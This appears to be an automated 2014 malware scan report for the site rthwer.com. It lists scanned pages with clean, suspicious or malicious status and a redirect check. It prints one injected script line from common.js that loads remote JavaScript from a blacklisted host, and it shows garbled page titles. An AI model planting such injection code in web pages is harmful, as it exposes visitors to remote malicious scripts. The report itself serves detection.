Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=rthwer.com
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://rthwer.com/ | HTTP/1.1 200 OK Date: Thu, 04 Sep 2014 12:28:59 GMT Accept-Ranges: bytes ETag: "50db7af2f0c7cf1:949a" Server: Microsoft-IIS/6.0 Content-Length: 17871 Content-Location: http://rthwer.com/index.html Content-Type: text/html Last-Modified: Thu, 04 Sep 2014 03:33:09 GMT X-Powered-By: ASP.NET | clean |
http://rthwer.com/index.html | 200 OK Content-Length: 17871 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: cnjiahe.net
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>ÑÇÖÝÅ®ÓÅ_»Ø¼ÒÉ«×ÛºÏÍø¡¾2014È«¼¯¡¿</title>
<meta name="keywords" content="ÑÇÖÝÅ®ÓÅ,»Ø¼ÒÉ«×ÛºÏÍø"/>
<meta name="description" content="ÑÇÖÝÅ®ÓŹٷ½ÍøÌṩÃâ·ÑµÇ½ ...[4484 bytes skipped]... | ||
http://rthwer.com/common.js | 200 OK Content-Length: 96 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: js.lwtzdec.com
document.writeln("<SCRIPT language=javascript src=\"http://js.lwtzdec.com/zy.js\"></SCRIPT>");
Decoded script: <SCRIPT language=javascript src="http://js.lwtzdec.com/zy.js"></SCRIPT> | ||
http://rthwer.com/tj.js | 200 OK Content-Length: 122 Content-Type: application/x-javascript | clean |
http://rthwer.com/nwsngys/ | HTTP/1.1 200 OK Date: Thu, 04 Sep 2014 12:29:02 GMT Accept-Ranges: bytes ETag: "1c48fb1abc7cf1:949a" Server: Microsoft-IIS/6.0 Content-Length: 12876 Content-Location: http://rthwer.com/nwsngys/index.html Content-Type: text/html Last-Modified: Wed, 03 Sep 2014 19:17:24 GMT X-Powered-By: ASP.NET | clean |
http://rthwer.com/nwsngys/index.html | 200 OK Content-Length: 12876 Content-Type: text/html | clean |
http://rthwer.com/mgavdyw/ | HTTP/1.1 200 OK Date: Thu, 04 Sep 2014 12:29:03 GMT Accept-Ranges: bytes ETag: "321e46b1abc7cf1:949a" Server: Microsoft-IIS/6.0 Content-Length: 12986 Content-Location: http://rthwer.com/mgavdyw/index.html Content-Type: text/html Last-Modified: Wed, 03 Sep 2014 19:17:24 GMT X-Powered-By: ASP.NET | clean |
http://rthwer.com/mgavdyw/index.html | 200 OK Content-Length: 12986 Content-Type: text/html | clean |
http://rthwer.com/avttyz/ | HTTP/1.1 200 OK Date: Thu, 04 Sep 2014 12:29:05 GMT Accept-Ranges: bytes ETag: "92f81fb1abc7cf1:949a" Server: Microsoft-IIS/6.0 Content-Length: 12752 Content-Location: http://rthwer.com/avttyz/index.html Content-Type: text/html Last-Modified: Wed, 03 Sep 2014 19:17:24 GMT X-Powered-By: ASP.NET | clean |
http://rthwer.com/avttyz/index.html | 200 OK Content-Length: 12752 Content-Type: text/html | clean |
http://rthwer.com/yzstbdbdbdbdbd/ | HTTP/1.1 200 OK Date: Thu, 04 Sep 2014 12:29:06 GMT Accept-Ranges: bytes ETag: "62b33b1abc7cf1:949a" Server: Microsoft-IIS/6.0 Content-Length: 13184 Content-Location: http://rthwer.com/yzstbdbdbdbdbd/index.html Content-Type: text/html Last-Modified: Wed, 03 Sep 2014 19:17:24 GMT X-Powered-By: ASP.NET | clean |
http://rthwer.com/yzstbdbdbdbdbd/index.html | 200 OK Content-Length: 13184 Content-Type: text/html | clean |
http://rthwer.com/kbrbmnxz/ | HTTP/1.1 200 OK Date: Thu, 04 Sep 2014 12:29:08 GMT Accept-Ranges: bytes ETag: "565352f2f0c7cf1:949a" Server: Microsoft-IIS/6.0 Content-Length: 12947 Content-Location: http://rthwer.com/kbrbmnxz/index.html Content-Type: text/html Last-Modified: Thu, 04 Sep 2014 03:33:08 GMT X-Powered-By: ASP.NET | clean |
http://rthwer.com/kbrbmnxz/index.html | 200 OK Content-Length: 12947 Content-Type: text/html | clean |
http://rthwer.com/kbrbmnxz/76820140904.html | 200 OK Content-Length: 11631 Content-Type: text/html | clean |
http://rthwer.com/nwsngys/55920140827.html | 200 OK Content-Length: 11558 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: wzbiwei.com
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> <title>Òç³öÍæζÍâÃæÅÜwww.11aabb.comÆð¾«Á¦·Åµ½½â¾ö×ʽðÉÏ_ÑÇÖÝÅ®ÓÅ_»Ø¼ÒÉ«×ÛºÏÍø¡¾2014È«¼¯¡¿</title> <meta name="keywords" content="www.11aabb.com"/> & ...[4579 bytes skipped]... | ||
http://rthwer.com/avttyz/55620140823.html | 200 OK Content-Length: 11859 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: bxyhsteel.com
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> <title>»ØÈ¥½è¿îʲôʱºò³¯Àï×ßÎÒÏàÐÅ_ÑÇÖÝÅ®ÓÅ_»Ø¼ÒÉ«×ÛºÏÍø¡¾2014È«¼¯¡¿</title> <meta name="keywords" content="¿ì²¥Ôõô²¥·Å²»ÁË"/> <meta name="descr ...[4553 bytes skipped]... | ||
http://rthwer.com/nwsngys/2820140823.html | 200 OK Content-Length: 11136 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: fsw1688.com
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> <title>¸Ð¾õ¼¸ºõÀÓ½øºÚ»¢¶ÓÐåÇòÅ×¾ü¶Ó_ÑÇÖÝÅ®ÓÅ_»Ø¼ÒÉ«×ÛºÏÍø¡¾2014È«¼¯¡¿</title> <meta name="keywords" content="³ÉÈË°æÐÔ"/> <meta name="description" ...[4578 bytes skipped]... | ||
http://rthwer.com/mgavdyw/1320140823.html | 200 OK Content-Length: 10830 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: wwtaiqiu.com
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> <title>ÎÒÐÁ¿àÎÒÄÐÈ˵ÄÊ®´óÃûÆ÷ͼè÷ÃÎ_ÑÇÖÝÅ®ÓÅ_»Ø¼ÒÉ«×ÛºÏÍø¡¾2014È«¼¯¡¿</title> <meta name="keywords" content="ÄÐÈ˵ÄÊ®´óÃûÆ÷ͼ"/> <meta name="descr ...[4550 bytes skipped]... | ||
http://rthwer.com/mgavdyw/33020140823.html | 200 OK Content-Length: 11102 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: sgzl18.com
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> <title>ÊÂÇéÉëÒ÷ÉùÊʺϴò·É»úµÄÊÓƵ±¦±´_ÑÇÖÝÅ®ÓÅ_»Ø¼ÒÉ«×ÛºÏÍø¡¾2014È«¼¯¡¿</title> <meta name="keywords" content="Êʺϴò·É»úµÄÊÓƵ"/> <meta name="de ...[4551 bytes skipped]... | ||
http://rthwer.com/kbrbmnxz/5520140825.html | 200 OK Content-Length: 10963 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: rthwer.com
Result:
HTTP/1.1 200 OK
Date: Thu, 04 Sep 2014 12:28:59 GMT
Accept-Ranges: bytes
ETag: "50db7af2f0c7cf1:949a"
Server: Microsoft-IIS/6.0
Content-Length: 17871
Content-Location: http://rthwer.com/index.html
Content-Type: text/html
Last-Modified: Thu, 04 Sep 2014 03:33:09 GMT
X-Powered-By: ASP.NET
...17871 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: rthwer.com
Referer: http://www.google.com/search?q=rthwer.com
Result:
The result is similar to the first query. There are no suspicious redirects found.